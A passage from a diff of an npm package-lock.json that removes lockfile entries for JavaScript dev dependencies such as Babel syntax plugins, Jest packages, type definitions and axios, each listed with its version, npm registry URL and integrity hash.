"https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "dependencies": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, - "dependencies": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.4.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/fake-timers": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", - "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/schemas": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, - "dependencies": { - "@sinclair/typebox": "^0.27.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/transform": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true - }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", - "dev": true, - "dependencies": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - } - }, - "node_modules/@jridgewell/trace-mapping/node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "node_modules/@nicolo-ribaudo/semver-v6": { - "version": "6.3.3", - "resolved": "https://registry.npmjs.org/@nicolo-ribaudo/semver-v6/-/semver-v6-6.3.3.tgz", - "integrity": "sha512-3Yc1fUTs69MG/uZbJlLSI3JISMn2UV2rg+1D/vROUqZyh3l6iYHCs7GMp+M40ZD7yOdDbYjJcU1oTJhrc+dGKg==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^3.0.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.20.7" - } - }, - "node_modules/@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "node_modules/@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } - }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" - } - }, - "node_modules/@types/jest": { - "version": "29.5.3", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, - "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "node_modules/@types/node": { - "version": "20.4.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.4.1.tgz", - "integrity": "sha512-JIzsAvJeA/5iY6Y/OxZbv1lUcc8dNSE77lb2gnBH+/PJ3lFR1Ccvgwl5JWnHAkNHcRsT0TbpVOsiMKZ1F/yyJg==", - "dev": true - }, - "node_modules/@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, - "dependencies": { - "@types/yargs-parser": "*" - } - }, - "node_modules/@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "dependencies": { - "type-fest": "^0.21.3" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "dependencies": { - "sprintf-js": "~1.0.2" - } - }, - "node_modules/asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" - }, - "node_modules/axios": { - "version": "1.6.0", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.6.0.tgz", - "integrity": "sha512-EZ1DYihju9pwVB+jg67ogm+Tmqc6JmhamRN6I4Zt8DfZu5lbcQGw3ozH9lFejSJgs/ibaef3A9PMXPLeefFGJg==", - "dependencies": { - "follow-redirects": "^1.15.0", - "form-data": "^4.0.0", - "proxy-from-env": "^1.1.0" - } - }, - "node_modules/babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" - } - }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": 